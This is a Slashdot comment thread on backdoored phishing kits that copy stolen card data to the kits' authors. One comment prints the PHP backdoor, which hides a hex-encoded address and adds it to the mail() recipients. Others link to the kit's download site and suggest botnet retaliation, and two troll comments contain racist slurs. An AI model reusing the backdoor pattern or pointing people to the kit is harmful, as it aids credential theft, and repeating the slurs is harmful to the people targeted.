Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Phishing Group Caught Stealing From Other Phishers

samzenpus posted more than 6 years ago | from the what's-good-for-the-goose dept.

Security 129

An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them. Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."

cancel ×

129 comments

Sorry! There are no comments related to the filter you selected.

Optimum online so fast, so fine (0, Offtopic)

pyro_dude (15885) | more than 6 years ago | (#22162232)

Frist ps0t

Re:Optimum online so fast, so fine (-1, Offtopic)

Mouthless Wolf (1153783) | more than 6 years ago | (#22162272)

Cool.

Re:Optimum online so fast, so fine (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22162390)

R.I.P. Heath Ledger [blogspot.com]

How times have changed: you can't trust.....wait! (3, Interesting)

whoever57 (658626) | more than 6 years ago | (#22162254)

But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.

Re:How times have changed: you can't trust.....wai (5, Interesting)

cortesoft (1150075) | more than 6 years ago | (#22162310)

Except they are actually double feeding off innocent people.... some poor chap's info gets stolen by both the guy who deployed the phishing kit and the guy who wrote it.... which means its probably at least twice as likely to get used for fraud.

Re:How times have changed: you can't trust.....wai (4, Insightful)

v1 (525388) | more than 6 years ago | (#22162434)

they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?

Re:How times have changed: you can't trust.....wai (2, Interesting)

mh1997 (1065630) | more than 6 years ago | (#22165534)

they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?
It really does not matter how much is fraudulantly charged on my credit card. I am not responsible for either amount.

Looking at the larger picture, I want as small amount of fraud as possible because the cost of goods will be cheaper. Somebody has to recoup that $4000 or $8000 in your example, but what happens, everyone pays for fraud, but spread out over every purchase made, it is probably lower than the sales tax you pay on each individual transaction.

For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year. You'd also be amazed at the businesses (big box stores and little local stores) that will give you a discount for cash if you ask.

Re:How times have changed: you can't trust.....wai (3, Insightful)

GroeFaZ (850443) | more than 6 years ago | (#22162540)

Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".

Re:How times have changed: you can't trust.....wai (2, Funny)

cart_man4524 (623980) | more than 6 years ago | (#22163288)

hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so whats the problem?

Re:How times have changed: you can't trust.....wai (1)

Dr_SimonCPU (1181635) | more than 6 years ago | (#22165098)

hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so whats the problem?
The smart ones are not the ones on the top, unfortunately.

Re:How times have changed: you can't trust.....wai (2, Interesting)

Zeinfeld (263942) | more than 6 years ago | (#22165704)

Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".

Exactly, in the chat rooms the criminals are far more worried about each other than the forces of law and order. OK they are concerned that the person might be from a security company (our guys) or a police officer. But they are rather more angry about 'rippers' -criminals who take the money but never deliver the goods or take goods and don't pay for them.

In the shadowcrew organization about a third of the management team was occupied as enforcers. In fact that is how they got caught, they ended up in a turf war and someone turned them in to police.

As in all criminal organizations the guys at the bottom get chicken feed. All the money flows up the pyramid, just like the Sopranos. A street drug dealer is likely to be in prison of dead in two to three years on average and makes less than minimum wage. The typical botnet herder makes less than they would flipping burgers. All the money flows up.

Re:How times have changed: you can't trust.....wai (4, Insightful)

bhmit1 (2270) | more than 6 years ago | (#22162746)

But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
This would only be a good thing if phishers were stealing the account information of other phishers. But since they are just spreading your number to more phishers, your best hope is that competing phishers raise the fraud alert on your credit cards faster (credit card companies look for unusual purchases, and placing multiple orders in stores on opposite sides of the country at the same time is a pretty easy flag for them).

Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source. Then everyone receiving this spam can provide so many bad account numbers that phishing is very difficult to do without drawing attention to yourself.

Re:How times have changed: you can't trust.....wai (2, Interesting)

morethanapapercert (749527) | more than 6 years ago | (#22163432)

There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. If, for example, my mother-in-law from Mr. BadGuy Phisher gets an email offering (of all things) heavily discounted embroidery pattern files for her embroidery machine. She thinks he really has such files for sale, she actually does want the product, so she provides her real CC# and not the false one. Now, this is a woman who is keenly aware of the potential for credit card fraud and identity theft. I have seen her save all of her receipts and manual charge slips in a shopping bag so her husband can burn them out in the shop. She is convinced that Bad Men are rooting through trash to collect CC's and banking info. She is convinced that these Bad Men are somehow able to access her account based on the string of numbers that appear on the receipt when she uses her debit card.
  Yet, despite this paranoia, she still buys hordes of knick-knacks, limited edition "collectibles", sewing supplies and such on EBay. Paypal being too scary for her, she uses her CC to pay for all of that. Try as I might, I can't seem to persuade her that a person in CA selling cutesy crocheted animal sweaters could be a Bad Man just as easily as some person rooting through her trash. As for email based scams; well, I set up her email client to reject anyone not already in her address book and have trained her in the habit of sending the initial email to them, rather than waiting until she gets one. As a major side benefit for me, it has drastically cut down the number of "cute", "humorous" or "inspirational" forwards she sends me.

*The bar to appear safe and legit enough for some users can be staggeringly low. Lets face it, there are always going to be some stupid people around.

Re:How times have changed: you can't trust.....wai (1)

xenocide2 (231786) | more than 6 years ago | (#22163576)

Man. Remember when people wanted to use Credit Card numbers as proof of age for adult materials? Glad that never happened!

Re:How times have changed: you can't trust.....wai (0)

Anonymous Coward | more than 6 years ago | (#22165716)

Man. Remember when people wanted to use Credit Card numbers as proof of age for adult materials? Glad that never happened!

 
Not so. My mobile company still does that.

Re:How times have changed: you can't trust.....wai (1)

TroopaCabra (787941) | more than 6 years ago | (#22164288)

RE: There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. ...C'mon- you can't spot an email from phishers? Not everyone will be able to recognize a phishing scheme- but a large percentage will. That's all that matters once the rest is in operation. No?

Re:How times have changed: you can't trust.....wai (4, Interesting)

morcego (260031) | more than 6 years ago | (#22164068)

Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source.


One of my ATM cards has 2 different pin numbers. If I use the alternative one, the transaction is completed normally (so no one on the spot gets wiser), but the institution will flag it and notify the police at once, providing my identity and location. I have to pay a little extra for eat (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have this since 1996, and I'm happy to say I never needed.

So yes, the banks know this kind of thing can be done. I wonder why other institutions don't do it or even why this is not mandatory for all cards.

I really don't mind the extra US$ 3/month for this service.

Re:How times have changed: you can't trust.....wai (1)

deroby (568773) | more than 6 years ago | (#22164656)

But that would only be useful when you're somehow "forced" to give your PIN isn't it (eg. when there's a gun to your head).

In the case of phishing you simply do not realize that you're giving away information to a fraud! You actually truly, veritably believe that you're doing something harmless, eg. paying for that book on Amazon (probably a bad example, but you get the drift). So why would you use the 'poisoned-PIN' in this situation ?

FYI : this reminds me of that urban legend where you were supposed to enter your PIN backwards to get the same effect (transaction works out OK but police is informed right away, etc...), amazing how many people believed that story... until I asked them what then would happen if your PIN read 1221. (yes, it *used* to be an old PIN number of mine, actually, it was my first ever... and no, that was 15 years ago and it's been changed plenty of times in the meantime and no, no use looking me up, I don't plan on using it again =)

Re:How times have changed: you can't trust.....wai (1)

Maximum Prophet (716608) | more than 6 years ago | (#22165744)

While this is an urban legend, several legislatures have proposed requiring banks to have PIN "Panic Codes". http://www.snopes.com/business/bank/pinalert.asp [snopes.com]
In the case of palindromic codes, just flip them inside out. i.e. 1221 becomes 2112.

Re:How times have changed: you can't trust.....wai (1)

Ajaxamander (646536) | more than 6 years ago | (#22166236)

And what if my PIN is 1111? Should I enter the two's-compliment?

Re:How times have changed: you can't trust.....wai (3, Informative)

nacturation (646836) | more than 6 years ago | (#22165050)

I have to pay a little extra for eat (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have this since 1996, and I'm happy to say I never needed.
I have a solution as well: use your credit card so that there's no liability to you even if someone does use it fraudulently. And since 1996, you've spent about $400 on this insurance you didn't need. The only time I could see that as being useful is if someone robs you while you're in the process of making a withdrawal at an ATM.
 

Re:How times have changed: you can't trust.....wai (2)

morcego (260031) | more than 6 years ago | (#22165792)

There is a new fad around criminals in my country that is called "flash kidnapping" (loose translation). They grab you, put a gun in your head, and drive you around to several ATM machines.

Re:How times have changed: you can't trust.....wai (1)

Kokuyo (549451) | more than 6 years ago | (#22164620)

I'd prefer a system where I could generate a credit card number every time I made a purchase online. Naturally, this is not going to work in stores or such, but at least online you could limit the damage one could do because the number works just once. Furthermore by noting where you've used the number you'd know exactly who has been leaking or misusing your number.

Re:How times have changed: you can't trust.....wai (1)

budgenator (254554) | more than 6 years ago | (#22165372)

What I want to see is financial institutions starting to use my chummer program [slashdot.org] ; catch a phishing site and send the sharks a couple GB of stinking fish guts quality data, until the computer crash and burn from the strain.

Re:How times have changed: you can't trust.....wai (0)

Anonymous Coward | more than 6 years ago | (#22166244)

Many credit card companies offer a free, online service to generate a one-time use CC# (I know Citi and Discover are doing this). You just log on to your account, generate a number for online purchase, and it is only valid to be used that one time.

It allows you to make your purchase online a single time, and if that number gets stolen, any transactions on it are flagged as not yours. At that point, giving out your real number, ever, seems poor, unless you are trying to set up recurring charges.

This isn't the same... (3, Insightful)

TheGreatHegemon (956058) | more than 6 years ago | (#22162972)

In the old days, if thieves stole from thieves, it meant the first thief was deprived of the stolen goods. This lead to conflict. However, with information like this, all it means is that *two* thieves have the same info.

Re:This isn't the same... (1)

MrShaggy (683273) | more than 6 years ago | (#22163108)

Twice the fun, none of the work. MMMM

Phishers have always done this. (0)

Anonymous Coward | more than 6 years ago | (#22163044)

This isn't news. Phishers have always taken advantage of script kiddies to obtain more credit card numbers or the like. Slashdot feels like it is run by 13 year olds. They know what a GeForce 8800 Ultra is, they know what DDR RAM is, they know what Linux and Unix is, but they are hardly advanced computer users.

Re:Phishers have always done this. (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22163390)

I went to college with Rob and Jeff. "13 year olds" is right. Kind of like Beavis and Butthead, except gay. It was funny at first, but then you realize it wasn't an act.

There's no Such Thing as a Free Lynch (1)

Morosoph (693565) | more than 6 years ago | (#22163114)

Not wanting to spoil the optimistic spirit of your own post :o)

Re:How times have changed: you can't trust.....wai (1)

Technician (215283) | more than 6 years ago | (#22164210)

But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.

I read an even better possibility into this. What if the kit was released by VISA/Master card, Discover, and American Express. They would have a front line into shutting down stolen card numbers, canceling cards and getting great data including IP addresses. Working with merchants, they could follow the canceled sales for a great bust of the ring. Brilliant if true.

Share (4, Funny)

Anonymous Coward | more than 6 years ago | (#22162278)

Hey, it's open source. Information wants to be free. It's all about sharing. Why shouldn't the developer of the phishing kit get some reward from the organization that profits from repackaging his code?

If they reall wanted to do it right, they could just pool all their resources and split the rewards. They could even invite others to join in, with a BotNet@Home project. Lend your computer to the BotNet, and get a prorated share of the take from stolen credit cards credited to your PayPal account.

Re:Share (0)

Anonymous Coward | more than 6 years ago | (#22162408)

Hell yeah, lets do that! I'll opt in.

(I'm a GNU/Linux user, so I actually have to opt in if I want to party... :)

Re:Share (2, Funny)

nacturation (646836) | more than 6 years ago | (#22165066)

They could release it under the GNU General Phishing License.
 

Re:Share (1)

budgenator (254554) | more than 6 years ago | (#22165416)

I was trying to find the download site, I'd like to see state of the art phishing code myself; if they want data, i could send them a few TB for fun.

Typical niggers. (-1, Troll)

Anonymous Coward | more than 6 years ago | (#22162280)

95% of them are criminal, you know.

RON PAUL '08

Poor script kiddies (0)

Anonymous Coward | more than 6 years ago | (#22162284)

Maybe they should bring charges against the script makers. That'd show everyone involved!

It's a little too soon for "backdoor" articles. (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22162286)

RIP Heath Ledger

[trolling subject line] (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22162292)

[inflammatory comment]

Re:[trolling subject line] (1)

PenGun (794213) | more than 6 years ago | (#22162450)

Ahhh! The meta master. [];

In soviet russia... (5, Funny)

Anonymous Coward | more than 6 years ago | (#22162298)

...phishers phish phishers... Say that five times fast.

Re:In soviet russia... (2, Funny)

Anonymous Coward | more than 6 years ago | (#22162810)

"that that that that that"

Not so hard...

Re:In soviet russia... (0)

Anonymous Coward | more than 6 years ago | (#22163472)

More like "Phishers phuck phraudsters ophphering phishing sophtware"

Re:In soviet russia... (1)

TroopaCabra (787941) | more than 6 years ago | (#22164318)

I have trouble saying it once~

This is great news (0)

www.tech4um.com (1218400) | more than 6 years ago | (#22162308)

Now if my mom falls victim to a phishing scam, I can rest assured now that her information is in the hands of even more phishers.

Re:This is great news (1)

Cheezymadman (1083175) | more than 6 years ago | (#22162598)

If your mom (or anyone for that matter) falls "victim" to phishing, they fucking deserve it. Anyone willing to hand out their credit card info to any website that looks moderately safe is a tool, and doesn't deserve to have a card.

Re:This is great news (1)

Kasimir Gabert (1046658) | more than 6 years ago | (#22162850)

... because everybody in the world reads Slashdot? Look outside of yourself, at least once a month. I think it would be healthy :)

Re:This is great news (1)

Cheezymadman (1083175) | more than 6 years ago | (#22162912)

If you're using the internet, you need to have some common sense. It's as simple as not using a site unless you see the exact url you want in the address bar.

Turning the tables on the phishers... smart! (-1, Troll)

Anonymous Coward | more than 6 years ago | (#22162312)

Judo in action.

Now let's brainstorm on how we can turn niggers from a problem into an advantage. Air drop them into Iraq?

Ron Paul 2008

The anti/phisher cat-and-mouse game sounds fun (0)

Anonymous Coward | more than 6 years ago | (#22162322)

World of Netcraft.

Re:The anti/phisher cat-and-mouse game sounds fun (1)

Nullav (1053766) | more than 6 years ago | (#22163098)

Netcraft confirms it?

Proverb (5, Funny)

OldManAndTheC++ (723450) | more than 6 years ago | (#22162330)

Phish from a man and you take advantage of him for a day.

Give a man a phishing kit and you take advantage of him for a lifetime.

(of course by "man" we mean spotty-faced script kiddie, and by "lifetime" we mean until he wipes his harddisk, but proverbs are meant to be pithy and brief, not accurate.)

Re:Proverb (1)

GroeFaZ (850443) | more than 6 years ago | (#22162556)

Well, you summarized TFA. Bonus points for avoiding a car analogy.

Re:Proverb (1)

cbotman (1213408) | more than 6 years ago | (#22162838)

Pithy means 'brief and forceful', so you don't need to say brief again. :)

I wish it were possible to zoom in... (1)

DutchSter (150891) | more than 6 years ago | (#22162370)

Of course all the big names are listed (Bank of America, Regions, etc), but it's too bad you can't zoom in on the screen shots. My local financial institution has been getting phished like crazy lately and it's always the same basic kit. Makes me wonder if it's this kit or something else. Whenever I get one of the emails I just have to check it out on my Mac Book in Firefox with JS disabled just to see if it's anything novel. Never is.

Naturally Netcraft won't tell you the real site name :-)

Re:I wish it were possible to zoom in... (3, Funny)

Anonymous Coward | more than 6 years ago | (#22162658)

I wait until I am at work to read those emails, I'm not going to risk my own computers.

Re:I wish it were possible to zoom in... (1)

mrv20 (1154679) | more than 6 years ago | (#22164498)

Don't mind the thudding sound you can hear in the background - it's just your sysadmin banging his/her head against the nearest wall in despair.

Re:I wish it were possible to zoom in... (5, Informative)

Mr. Roadkill (731328) | more than 6 years ago | (#22162686)

Naturally Netcraft won't tell you the real site name :-)
Naturally. And who can blame them? I certainly don't - who knows what kind of nasties they might have lurking on those pages waiting for unsuspecting CEO's and CIO's and security experts who ought to know better?

However, Google is your friend. Within 30 seconds of looking over the Netcraft article for helpfully unique strings, I found it. And went looking with lynx :-) I won't give the URL, to protect the stupid from themselves, but it's not that hard to find.

They've got ready-rolled scams for abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc,co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com - and in some cases, they have more than one for particular organisations.

Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?

Re:I wish it were possible to zoom in... (0)

Anonymous Coward | more than 6 years ago | (#22164034)

They've got ready-rolled scams for [...] stgeorge.com.au...
Who?

Oh wait, you're an Australian and desperate to mix with the big boys. Sorry.

Re:I wish it were possible to zoom in... (1)

ASBands (1087159) | more than 6 years ago | (#22164300)

All the e-mail formatting seems to come from the "Mr-Brain.php" file. I'm not sure about how this Mr-Brain character licenses his software, but I figure it is some form of creative commons or (L)GPL, so I should be fine with attribution. So: the following source code was created by Mr-Brain and last updated 2008-Jan-07. If you would like to contact him, please send an e-mail to al-brain@hotmail.fr [mailto] or albrain08@yahoo.fr [mailto] .

Never mind, I ran into the lameness filter of Slashdot for this guy's source code. Seems fitting. Messages are sent to the e-mail al-brain@hotmail.fr and the e-mail albrain08@yahoo.fr with the subject "BankofAmerica ReZulT | $ccno | $ip" send with the header "From: Mr-Brain". If you want the exact format, just go to his site (thebadboys[dot]org[slash]Brain and download the source (Mr-Brain.php).

This is for a Bank of America scam, but I'm assuming that the file is identical for the majority of the scams (which involve personal information), so the e-mail format will work everywhere. Anybody who feels the need to send personalized e-mail to Mr-Brain, please send them to the email address al-brain@hotmail.fr or the email address albrain08@yahoo.fr. Hopefully, he'll be very interested in free v1agra.

And, uh
email: al-brain@hotmail.fr
email: albrain08@yahoo.fr

The real backdoor email address... (2, Informative)

Anonymous Coward | more than 6 years ago | (#22164512)

It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.

Looking at the code more carefully you'll see..

details.php includes this in the phishing page form:

logon.php has these lines of code:
    $d="details.php";
    $erorr=file_get_contents($d);
    $IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));

and Mr-Brain.php has this:
    $send="al-brain@hotmail.fr,albrain08@yahoo.fr";
    $str=array($send, $IP);
    foreach ($str as $send)
        mail($send,$subject,$message,$headers);

Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.

The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com

Re:The real backdoor email address... (0)

Anonymous Coward | more than 6 years ago | (#22164576)

The hidden encoded value from details.php is:
    input type="hidden" name="niarB" value="10270696f6e6565722e627261696e40676d61696c2e636f6d"

Re:The real backdoor email address... (0)

Anonymous Coward | more than 6 years ago | (#22165222)

I got "brain.pioneer@gmail.com" as the email address from the HSBC scripts.

I would have thought that there would be more obfuscation here? It's not exactly difficult to spot that he's sending mails to an array containing whatever email address the kid puts in and some other variable!

Re:I wish it were possible to zoom in... (1)

Maximum Prophet (716608) | more than 6 years ago | (#22165800)

Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?
I would hope that would be the security guys at abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc,co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com.

All they have to do is send some trogan card numbers that "work", but are quickly traceable. Then send the cops to the addresses that the crooks are sending stuff to, or catch them at the store where they try to use the CC number.

Re:I wish it were possible to zoom in... (1)

budgenator (254554) | more than 6 years ago | (#22165454)

Check this out, I lost the code in a hard-drive failure but it's only one notch past "hello world" anyways so if you can't both learn Perl and rewrite chummer.pl [slashdot.org] in an half hour you don't belong in IT anyways.

Mr-Brain's site (5, Informative)

aerthling (796790) | more than 6 years ago | (#22162458)

Here's his site: http://thebadboys.org/Brain/ [thebadboys.org]

Re:Mr-Brain's site (0)

Anonymous Coward | more than 6 years ago | (#22166052)

Mod flamebait. This shouldn't just be laid in plain. And besides, any slashdotter who is really interested should find it easily.

SCANDALOUS! (0)

davidsyes (765062) | more than 6 years ago | (#22162470)

Scandalous I say! this is just tooo literally virtually phishy. Thieves without a code of honour. Is there no honour among thieves? Real fishermen can't ... wait, they can poach, and steal other's fish.

Anybody got a literal virtual stick of dynamite to blow up the caught fish?

Re:SCANDALOUS! (1)

Lewrker (749844) | more than 6 years ago | (#22162774)

A better analogy would be poachers selling poaching kits to frustrated adolescents which would trap the said script-kiddie and signal the real poacher to collect and skin both dumb animals.

Re:SCANDALOUS! (1)

arivanov (12034) | more than 6 years ago | (#22165816)

I suggest you watch "Specifics of the Russian National Fishing" aka "Osobennosti Nacionalnoi Rubalki" on the subject of dynamite and fishing. You will laugh your a*** off...

This is really sad.. (5, Interesting)

DigitAl56K (805623) | more than 6 years ago | (#22162506)

.. you just can't trust malware anymore!

Really though, this is nothing new. IIRC, some builds of Sub7 [wikipedia.org] had a reverse backdoor (not covered in the wiki article), as well as a master password that let the Sub7 crew take over a server (covered by the wiki article), and some builds even included hard drive killer when the master password was in use.

Re:This is really sad.. (1)

LilGuy (150110) | more than 6 years ago | (#22163440)

Sub7 wasn't the first. DeepThroat was the first major trojan to do this. It really sucked when the author convinced me and all my other IRC acquaintances to use it instead of BO and eventually told me he had a master password on it. By the time he gave the password to me his trojan was picked up by most of the major AVS' of the day. Dirty scoundrels. ;)

Nuke the phishers (4, Insightful)

enoz (1181117) | more than 6 years ago | (#22162518)

What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

It reminds me of the ol' days on instant messaging when people would pass around a supposed 'Nuke' program that would allow them to reboot people's computers, only to discover that their own computer crashed soon after.

Re:Nuke the phishers (1)

gotzero (1177159) | more than 6 years ago | (#22162560)

Hopefully if get people far enough down the ladder this would actually work. My not just flood the database with bad info? Hopefully having to sort through it would make it bad enough...

Re:Nuke the phishers (4, Informative)

FLEB (312391) | more than 6 years ago | (#22162644)

What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

The law, mostly. It's just as illegal for someone to make "counter-malware" to break into a computer uninvited as it is for anyone else to make malicious software that breaks in.

Just what is stopping law enforcement? (3, Interesting)

swb (14022) | more than 6 years ago | (#22162736)

Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?

Isn't it trivial for a government agency like the FBI or Treasury to track payments charged to any kind of electronic banking back to the recipient? Wouldn't an investigation "following the money" ultimately lead you to either the thief or at least greatly disrupt his activities? At a minimum it would expose the people that made their transactions work (banks, hosting companies, other otherwise "normal" business people).

A couple of decent RICO prosecutions and you would drive this stuff out of the United States and greatly reduce the scale of it.

But it never happens, and I can only think that somehow the government has somehow turned these people into some espionage rabbit hole and high level prosecutions would disrupt intelligence gathering. Because there is little reason the government couldn't do something about it if they wanted to.

Re:Just what is stopping law enforcement? (1)

NemoinSpace (1118137) | more than 6 years ago | (#22162986)

i am guessing you haven't considered Cock-up theory ? [wikipedia.org]

Re:Just what is stopping law enforcement? (0)

Anonymous Coward | more than 6 years ago | (#22163754)

Your link uses the term cock-up in a quote, it does not actually describe what the actual theory behind that term is or does the whole theory consist of only those few quotes?

Re:Just what is stopping law enforcement? (1)

MishgoDog (909105) | more than 6 years ago | (#22163592)

Because it would take just one 'blind' using a bank account such as a swiss bank account to foil the 'follow the money' approach. International co-operation is never at its best when it involves significant amount of money flowing INTO a country. It's simply not that simple.

Re:Just what is stopping law enforcement? (0)

Anonymous Coward | more than 6 years ago | (#22163628)

The problem is that most phishers don't bother to use the credit cards they get. They really can't since they quickly get too many to personally use. Instead they will sell the credit card lists to other crooks, who can then use the credit cards. Most of the time the theft is not investigated. (Investigating it is the responsibility of the credit card company. But they are happy to just write it off as shrinkage.) If it is investigated, and the perp is caught, you still haven't found the phisher.

For an additional challenge, a significant fraction of this type of crime comes from Russia. Which complicates any law enforcement efforts since the criminals generally have greased the appropriate palms.

Re:Just what is stopping law enforcement? (4, Informative)

ShaunC (203807) | more than 6 years ago | (#22163650)

Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
No, not really.

For the most part, these have been made federal crimes, even to the extent of superseding existing state laws. A few years ago, several states had passed fairly strong anti-spam laws. If someone violated the law, you could file against them in your local small claims court, and secure a guaranteed judgement (good luck collecting, but that's another story) if they didn't show. Slashdot regular Bennett Haselton made boilerplate of that process, as I recall. Then along came CAN-SPAM, which created huge loopholes and essentially declared that individual state laws about spam, if less tolerant than the federal statute, were no longer enforceable.

So now it's up to the feds to prosecute spammers, phishers, and other ill-willed malfeasants. Most of the time, the feds have better things to worry about, and unless you personally can prove tens of thousands in damages, they're unlikely to raise an eyebrow. You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink." What amounts to a data warehouse with a client app to query it, $200 million later and it's scrapped. Two hundred MILLION dollars down the drain on a failed initiative to, in essence, secure some data feeds, create some transformations, and develop a GUI to query the whole shebang. You really expect these guys to track down John Dodrescu in Romania who's spoofing a Bank of America website on some zombie PCs in Italy, oh wait, that was 10 minutes ago before the TTL on the DNS expired, now it's some zombie PCs in France?

Give me, a non-gov IT professional, a team of 10 people of my choosing, fund me with one single million dollars and some travel vouchers, and agree to keep the project going for one year. A lot of these assholes will be out of business inside of 6 months, with many of their contemporaries scared shitless of becoming the next statistic. No fatalities, just a lot of people behind bars. But the federal government doesn't work that way because as many of us are well aware, it isn't profitable to run an IT department. They'd rather hire 1,000 guys who may or may not be able to tell you which of (XM|XP|XTC) is a version of Windows, at $50K a year apiece, then bitch and moan that they can't stop the problem with $50mil so they can justify a bigger budget next year.

America is spending more money per day in Iraq than it would take to adequately investigate, build cases against, and convict all of the prolific spammers in the entire world.

No, I don't often wonder why these problems haven't been solved. The federal government has been tasked with solving them, and that's all the why I need.

Re:Just what is stopping law enforcement? (1)

noidentity (188756) | more than 6 years ago | (#22164150)

You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink."

No, but it makes me curious of the ultimate example.

Re:Just what is stopping law enforcement? (1)

Propaganda13 (312548) | more than 6 years ago | (#22163696)

Multiple countries and banking regulations make this hard to follow.

Without actually getting money, you could use the bots to order things on the internet and get them shipped to a large apt building or your 90 year old neighbor who can't get up to answer the door.

When I worked for a mail-order sports store, there were zipcodes that they wouldn't deliver to because of fraud.

Re:Nuke the phishers (1)

mpe (36238) | more than 6 years ago | (#22165154)

What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

Are law enforcement actually interested in persuing these kind of criminals in the first place?

Phishing... (3, Interesting)

Derek Loev (1050412) | more than 6 years ago | (#22162766)

It's amazing how many large websites are so vulnerable to even basic attacks. SQL Injection is still rampant (a simple well devised Google search can show you that) and many corporations leave credit card numbers unencrypted. Somebody with basic knowledge of SQL could attack a large amount of organizations without any trouble. I've seen this happen to too many people for me to ever trust important information on smaller sites.

Reminds me of a Star Wars quote... (1)

Chabil Ha' (875116) | more than 6 years ago | (#22162818)

Machines making machines? How perverse!
Phishers phishing phishers, yikes!

That's... (0)

Anonymous Coward | more than 6 years ago | (#22162948)

One phisher to phish them all!

Root Cause is Obviously Greed (1)

Axe4ever (1155411) | more than 6 years ago | (#22163184)

I can understand that people do hacking for fun..to show off their programming capabilities..but these kind of activities are forked off by greed..which causes these guys to go any way..i mean doing anything outta way to get a grab at other's grub..

Its a shame !!!

Free phishing kits with trojans (1)

kylehase (982334) | more than 6 years ago | (#22163252)

What we need are free phishing kits with trojans that report phishing sites to phishing filter databases or better yet to the administrators of site they're trying to emulate since they'd have the most incentive to take action. The hard part is hiding the trojan and traffic it generates.

funny (2, Funny)

timmarhy (659436) | more than 6 years ago | (#22163506)

what's the world come to when you can't trust someone selling phishing software!

Script kiddies? (0)

RobDollar (1137885) | more than 6 years ago | (#22163624)

Isn't "script kiddies" a form of inverted impartiality in the context of this, or any, summary. It's a bit abiguous and frustrating to some in the way it only reflects the writers point of view of who uses these programs. In the absence of a quirky and original last sentence, an anagram of "script kiddies" is "I predict kids"

Re:Script kiddies? (3, Interesting)

DigitAl56K (805623) | more than 6 years ago | (#22163786)

This is pretty much the correct usage.

From Wikipedia [wikipedia.org] :

In hacker culture, a script kiddie (occasionally script bunny, skidie, script kitty, script-running juvenile (SRJ), or similar) is a derogatory term used for an inexperienced malicious cracker who uses programs developed by others to attack computer systems, and deface websites. It is generally assumed that script kiddies are kids who lack the ability to write sophisticated hacking programs on their own,[1] and that their objective is to try to impress their friends or gain credit in underground cracker communities.

And that's exactly what's happening.

Customer support is available... (1)

fahrbot-bot (874524) | more than 6 years ago | (#22163930)

Cost:
  • $15/hour - Any major credit card.
  • $10/hour - Personal check (w/2 forms of ID).
  • $5/hour - Electronic Funds Transfer.
  • $1/hour - PayPal.

LOL N00bS!!! (0)

Anonymous Coward | more than 6 years ago | (#22164070)

Back in the BBS days people used to post credit card numbers and phone card numbers as... somebody dumb has got to take the fall for this sh...

Godphisher (1)

FreeDisk.nl (1181167) | more than 6 years ago | (#22164836)

As in any betrayal in the dark world of crime, there is only one solution. Masterphish to thief: "Now phirst you get one warning. But iph you do it again, you will sleep with the phishes..."

Rats! (1)

Fuzzypig (631915) | more than 6 years ago | (#22165322)

